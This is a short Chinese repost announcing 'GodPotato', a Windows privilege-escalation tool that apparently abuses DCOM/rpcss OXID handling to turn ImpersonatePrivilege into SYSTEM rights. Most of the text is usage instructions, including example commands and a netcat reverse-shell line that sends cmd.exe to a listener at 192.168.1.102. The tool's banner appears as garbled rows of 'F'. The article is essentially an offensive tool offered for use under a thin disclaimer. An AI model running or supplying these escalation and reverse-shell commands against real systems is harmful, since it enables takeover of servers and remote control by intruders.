基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,可以在Windows 2012-Windows 2022中实现提权。
rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato。
现在只要你有” ImpersonatePrivilege”权限,那你就是“NT AUTHORITY\SYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
受影响版本:
Windows8 - Windows 11Windows Server 2012 - Windows Server 2022
FFFFF FFF FFFFFFFFFFFFFF FFF FFFFFFFFFFF FFFF FFF FFF FFF FFF FFFFFF FFF FFF FFF FFF FFF FFFFFF FFF FFF FFF FFF FFF FFFFFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFFFFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFFFFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFFFFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFFFFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFFFFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFFFFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFFFFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFFFFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFFArguments:-cmd Required:True CommandLine (default cmd /c whoami)Example:GodPotato -cmd "cmd /c whoami"
使用程序内置的Clsid进行权限升级,执行一个简单的命令
GodPotato -cmd "cmd /c whoami"定制Clsid和执行命令
GodPotato -cmd "cmd /c whoami"执行反向的shell命令
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2 2012"文章来源: Khan安全攻防实验室
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650568463&idx=4&sn=e353cf37eb6020ffd40ab22de7d8be04&chksm=83bd12ebb4ca9bfdad751a46e6ffd47644eeec22f95097f00b509cef153ff493cbf1ca989f31#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh